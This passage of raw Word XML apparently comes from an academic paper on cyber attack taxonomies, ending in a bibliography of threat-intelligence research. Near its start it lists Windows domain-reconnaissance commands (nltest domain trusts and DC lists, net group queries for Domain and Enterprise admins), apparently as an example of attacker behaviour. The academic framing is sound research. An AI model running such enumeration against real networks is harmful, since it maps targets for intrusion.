        <w:t xml:space="preserve"> /groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F57A0" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>cmd.exe /C query session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE16AEB" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %HOMEDRIVE%%HOMEPATH%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF9264" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="352FB1B6" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dclist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1737B" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>cmd.exe /C net group "Enterprise admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07066FAE" w14:textId="7577D96C" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>cmd.exe /C net group "Domain admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE6B1D" w14:textId="77777777" w:rsidR="00001886" w:rsidRPr="00DD1FAC" w:rsidRDefault="00001886" w:rsidP="00EF76CF"/>
    <w:p w14:paraId="2A0241EC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC"/>
    <w:bookmarkEnd w:id="147"/>
    <w:p w14:paraId="70B15B19" w14:textId="5F00CE48" w:rsidR="00512BCC" w:rsidRDefault="00512BCC" w:rsidP="007601E7"/>
    <w:p w14:paraId="7629171B" w14:textId="216859D3" w:rsidR="00AA4017" w:rsidRDefault="00AA4017" w:rsidP="00EB75FB"/>
    <w:p w14:paraId="3B4AC699" w14:textId="3EB1B858" w:rsidR="00AA4017" w:rsidRDefault="00AA4017" w:rsidP="00EB75FB"/>
    <w:p w14:paraId="42F9DCDD" w14:textId="069ADC69" w:rsidR="00AA4017" w:rsidRDefault="00AA4017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBA364" w14:textId="21C76297" w:rsidR="003A1025" w:rsidRPr="003A1025" w:rsidRDefault="00AA4017" w:rsidP="003A1025">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">ADDIN Mendeley Bibliography CSL_BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003A1025" w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bahrami, P. N., Dehghantanha, A., Dargahi, T., Parizi, R. M., Choo, K. K. R., &amp; Javadi, H. H. S. (2019). Cyber kill chain-based taxonomy of advanced persistent threat actors: Analogy of tactics, techniques, and procedures. </w:t>
      </w:r>
      <w:r w:rsidR="003A1025" w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Journal of Information Processing Systems</w:t>
      </w:r>
      <w:r w:rsidR="003A1025" w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003A1025" w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="003A1025" w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(4), 865–889. https://doi.org/10.3745/JIPS.03.0126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C481470"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Barnum, S. (2008). Common attack pattern enumeration and classification (CAPEC) schema description. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cigital Inc, Http://Capec. Mitre. Org/Documents/ …</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 1–20. http://capec.mitre.org/documents/documentation/CAPEC_Schema_Description_v1.3.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444CFC0"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Barnum, Sean. (2014). Standardizing cyber threat intelligence information with the Structured Threat Information eXpression (STIX</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TM</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE Corporation, July</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 1–20. https://doi.org/10.1002/ejoc.201200111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2C208"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Chapman, I. M., Leblanc, S. P., &amp; Partington, A. (2011). Taxonomy of cyber attacks and simulation of their effects. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2011 Military Modeling &amp; Simulation Symposium</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 73–80. http://dl.acm.org/citation.cfm?id=2048569</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A791B"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Derbyshire, R., Green, B., Prince, D., Mauthe, A., &amp; Hutchison, D. (2018). An Analysis of Cyber Security Attack Taxonomies. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proceedings - 3rd IEEE European Symposium on Security and Privacy Workshops, EURO S and PW 2018</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 153–161. https://doi.org/10.1109/EuroSPW.2018.00028</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44F698"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ENISA. (2021). ENISA Threat Landscape 2021. In </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>European Union Agency for Cybersecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Issue October). https://doi.org/10.2824/324797</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B513BC"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Hansman, S., &amp; Hunt, R. (2005). A taxonomy of network and computer attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Computers and Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1), 31–43. https://doi.org/10.1016/j.cose.2004.06.011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3106E"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Harknett, R. J., &amp; Smeets, M. (2022). Cyber campaigns and strategic outcomes. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Journal of Strategic Studies</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(4), 534–567. https://doi.org/10.1080/01402390.2020.1732354</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A0CA1"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Kiwia, D., Dehghantanha, A., Choo, K. K. R., &amp; Slaughter, J. (2018). A cyber kill chain based taxonomy of banking Trojans for evolutionary computational intelligence. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Journal of Computational Science</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 394–409. https://doi.org/10.1016/j.jocs.2017.10.020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A32698"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Korban, C. A., Miller, D. P., Pennington, A., &amp; Thomas, C. B. (2017). </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apt 3 adversary emulation plan</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 17–3569. https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C9891"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Meyers, C., Powers, S., &amp; Faissol, D. (2009). Taxonomies of cyber adversaries and attacks: a survey of incidents and approaches. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>… National Laboratory (April …</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>August 2007</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 1–22. https://doi.org/10.2172/967712</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45E817"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Pöhn, D., &amp; Hommel, W. (2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TaxIdMA: Towards a Taxonomy for Attacks related to Identities</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 1–13. https://doi.org/10.1145/3538969.3544430</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5861C"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Shalyapin, A., &amp; Zhukov, V. (2015). </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Case based analysis in information security incidents management system</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. https://dl.acm.org/doi/pdf/10.1145/2799979.2799990</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56AC26"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Simmons, C., Shiva, S., Bedi, H., &amp; Dasgupta, D. (2009). AVOIDIT: A Cyber Attack Taxonomy. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9th Annual Symposium on Information Assurance</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 39–47. http://www.teraits.com/pitagoras/marcio/segapp/CyberAttackTaxonomy_IEEE_Mag.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E170EAF"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Takahashi, Y., Shima, S., Tanabe, R., &amp; Yoshioka, K. (2020). APTGen: An approach towards generating practical dataset labelled with targeted attack sequences. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSET 2020 - 13th USENIX Workshop on Cyber Security Experimentation and Test, Co-Located with USENIX Security 2020</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. https://www.usenix.org/system/files/cset20-paper-takahashi.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B4A76"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Uma, M., &amp; Padmavathi, G. (2013). A survey on various cyber attacks and their classification. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>International Journal of Network Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(5), 390–396. http://ijns.jalaxy.com.tw/contents/ijns-v15-n5/ijns-2013-v15-n5-p390-396.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31844026"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Van Heerden, R., Von Soms, S., &amp; Mooi, R. (2016). Classification of cyber attacks in South Africa. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2016 IST-Africa Conference, IST-Africa 2016</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 1–16. https://doi.org/10.1109/ISTAFRICA.2016.7530663</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399DBCE2"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t xml:space="preserve">Vassilev, V., Sowinski-Mydlarz, V., Gasiorowski, P., Ouazzane, K., &amp; Phipps, A. (2021). Intelligence Graphs for Threat Intelligence and Security Policy Validation of Cyber Systems. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Advances in Intelligent Systems and Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1164</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(January), 125–139. https://doi.org/10.1007/978-981-15-4992-2_13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73640416"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szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Zhu, B., Joseph, A., &amp; Sastry, S. (2011). A taxonomy of cyber attacks on SCADA systems. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proceedings - 2011 IEEE International Conferences on Internet of Things and Cyber, Physical and Social Computing, IThings/CPSCom 2011</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 380–388. https://doi.org/10.1109/iThings/CPSCom.2011.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDC5F6" w14:textId="77777777" w:rsidR="003A1025" w:rsidRPr="003A1025" w:rsidRDefault="003A1025" w:rsidP="003A1025">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zhu, Z., &amp; Dumitras, T. (2018). ChainSmith: Automatically Learning the Semantics of Malicious Campaigns by Mining Threat Intelligence Reports. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proceedings - 3rd IEEE European Symposium on Security and Privacy, EURO S and P 2018</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1025">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 458–472. https://doi.org/10.1109/EuroSP.2018.00039</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E065E9D" w14:textId="5D35AFA9" w:rsidR="00AA4017" w:rsidRDefault="00AA4017" w:rsidP="00EB75FB">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BCC7D6" w14:textId="77777777" w:rsidR="00EB75FB" w:rsidRDefault="00EB75FB" w:rsidP="00943069"/>
    <w:p w14:paraId="26CB3BB5" w14:textId="77777777" w:rsidR="004D56C8" w:rsidRDefault="004D56C8" w:rsidP="00943069"/>
    <w:p w14:paraId="4EC5F8D5" w14:textId="77777777" w:rsidR="00BB17FF" w:rsidRDefault="00BB17FF" w:rsidP="00943069"/>
    <w:p w14:paraId="1D49ED85" w14:textId="77777777" w:rsidR="00C21BAE" w:rsidRDefault="00C21BAE" w:rsidP="00943069"/>
    <w:p w14:paraId="390D05AC" w14:textId="77777777" w:rsidR="00C21BAE" w:rsidRPr="00943069" w:rsidRDefault="00C21BAE" w:rsidP="00943069"/>
    <w:p w14:paraId="0AD01770" w14:textId="77777777" w:rsidR="00943069" w:rsidRDefault="00943069" w:rsidP="001358D1"/>
    <w:p w14:paraId="61DB3A13" w14:textId="324FC6EA" w:rsidR="002831DD" w:rsidRDefault="002831DD" w:rsidP="001358D1"/>
    <w:p w14:paraId="398EDAF2" w14:textId="77777777" w:rsidR="002831DD" w:rsidRPr="002831DD" w:rsidRDefault="002831DD" w:rsidP="001358D1"/>
